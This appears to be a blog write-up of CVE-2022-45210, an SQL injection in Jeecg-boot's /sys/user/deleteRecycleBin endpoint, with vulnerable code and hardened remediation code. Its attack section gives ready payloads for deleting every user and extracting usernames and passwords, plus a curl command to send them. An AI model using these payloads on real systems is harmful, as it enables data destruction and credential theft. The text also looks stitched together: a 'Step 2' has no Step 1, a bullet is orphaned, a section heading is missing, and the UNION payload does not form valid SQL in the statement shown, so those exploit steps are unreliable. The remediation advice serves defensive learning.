Jeecg-boot is a popular low-code platform used by many businesses for rapid development. In late 2022, a significant vulnerability was discovered affecting version 3.4.3 and possibly earlier versions. This post walks you through the CVE-2022-45210 SQL injection vulnerability found in the /sys/user/deleteRecycleBin component, explains how it can be exploited, shows code snippets, and offers resources for further reading.
## What is CVE-2022-45210?
CVE-2022-45210 is a SQL injection vulnerability that could let an attacker execute arbitrary SQL commands on the Jeecg-boot database by manipulating input parameters sent to a specific endpoint.
- Vulnerable Version: Jeecg-boot v3.4.3
- Affected Path: /sys/user/deleteRecycleBin
- Execute further attacks using the compromised data
This vulnerability could result in full loss of confidentiality, integrity, and availability of your Jeecg-boot application.
## Where is the Issue?
The vulnerability exists in the deleteRecycleBin function in the Jeecg-boot user management system. It does not properly validate or sanitize user input before using it in an SQL query.
Here’s a simplified version of the vulnerable Java Spring code:

```java
// Inside SysUserController.java
@PostMapping("/deleteRecycleBin")
public Result<?> deleteRecycleBin(@RequestBody String ids) {
    // ids comes directly from the HTTP request body and is not sanitized
    String sql = "DELETE FROM sys_user WHERE id in (" + ids + ")";
    jdbcTemplate.execute(sql); // Direct SQL execution: the request body becomes part of the statement text
    return Result.OK();
}
```
Problem: The ids parameter is directly used in an SQL statement without validation or parameterization.
Normally, this endpoint is meant to delete users by their ids:

```http
POST /sys/user/deleteRecycleBin
Content-Type: application/json

["1","2","3"]
```
## Step 2: Craft a Malicious Request
Suppose you want to dump the list of all users (for demonstration). You can manipulate the ids input to inject your own SQL.
Example of a malicious payload:

```http
POST /sys/user/deleteRecycleBin
Content-Type: application/json

["1) OR 1=1--"]
```
Resulting SQL:

```sql
DELETE FROM sys_user WHERE id in (1) OR 1=1--);
```
This query can delete all users in the table, not just the intended ones.
Or extract data (using UNION):

```json
["1) UNION SELECT GROUP_CONCAT(username, ':', password) FROM sys_user--"]
```
*This can leak usernames and hashed passwords to the application log, error messages, or response if the output is not tightly controlled.*
1. Prepare a Burp Suite, Postman, or curl command
2. Send payloads as shown above to /sys/user/deleteRecycleBin
3. Observe the results: Do you get errors? Are records mass deleted? Is sensitive data returned or leaked?

```bash
curl -k -X POST https://targetsite.com/sys/user/deleteRecycleBin \
  -H 'Content-Type: application/json' \
  --data-binary '["1) OR 1=1--"]'
```
---
- Refactor the code to use parameterized/prepared statements. Note that a single `?` placeholder cannot bind a whole list for an `IN (...)` clause in plain JDBC; use `NamedParameterJdbcTemplate`, which expands a bound collection into one placeholder per element:

```java
// Each id is sent to the database as a bound parameter, never as SQL text
String sql = "DELETE FROM sys_user WHERE id in (:ids)";
namedParameterJdbcTemplate.update(sql, Collections.singletonMap("ids", idList)); // idList is a List<String>
```
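A fuller hardened handler, as an added example that is not Jeecg-boot's own code: it lets Spring parse the body as a JSON array (so `"1) OR 1=1--"` arrives as one opaque string element), rejects any id that is not a short alphanumeric token, and binds the survivors through `NamedParameterJdbcTemplate`. The controller class name, the id pattern, the 100-item cap and the `int` return type are assumptions.

```java
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;
import org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;

// Hypothetical controller (not Jeecg-boot's SysUserController)
@RestController
public class RecycleBinController {

    // Assumption: ids are short alphanumeric tokens. Anything containing
    // quotes, parentheses, spaces or comment markers is rejected outright.
    private static final Pattern ID_PATTERN = Pattern.compile("^[A-Za-z0-9]{1,32}$");
    private static final int MAX_IDS = 100; // assumed cap on one bulk delete

    private final NamedParameterJdbcTemplate jdbc;

    public RecycleBinController(NamedParameterJdbcTemplate jdbc) {
        this.jdbc = jdbc;
    }

    @PostMapping("/sys/user/deleteRecycleBin")
    public int deleteRecycleBin(@RequestBody List<String> ids) {
        List<String> clean = validateIds(ids);
        // The collection bound to :ids is expanded to (?, ?, ...) by Spring,
        // so every id travels as a bound parameter and never as SQL text.
        return jdbc.update("DELETE FROM sys_user WHERE id IN (:ids)",
                           Map.of("ids", clean));
    }

    // Defence in depth: even though the ids are parameterized, refuse input
    // that does not look like an id, and cap the batch size.
    static List<String> validateIds(List<String> ids) {
        if (ids == null || ids.isEmpty() || ids.size() > MAX_IDS) {
            throw new IllegalArgumentException("ids must hold 1.." + MAX_IDS + " entries");
        }
        for (String id : ids) {
            if (id == null || !ID_PATTERN.matcher(id).matches()) {
                throw new IllegalArgumentException("rejected id: " + id);
            }
        }
        return ids;
    }
}
```

A rejected id should surface as a 400 response and a log line naming the endpoint, which also gives a simple detection signal for probing of this path.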
## References
- CVE-2022-45210 on NVD
- Project GitHub: Jeecg-boot
- OWASP SQL Injection Cheat Sheet
## Conclusion
CVE-2022-45210 represents a critical oversight in user input handling in Jeecg-boot v3.4.3. SQL injection can be devastating, but it’s easy to prevent with proper input validation and safe coding practices.
If you use Jeecg-boot, upgrade right away and audit your application for similar vulnerabilities. Never trust the client — always sanitize and parameterize your queries.
Stay safe and secure your apps!
*If you have any questions or need remediation help, feel free to reach out or ask in the Jeecg-boot GitHub Issues.*
Disclaimer: This content is for educational purposes only. Do not use on systems you don't own or have permission to test.
## Timeline
Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:41:00 UTC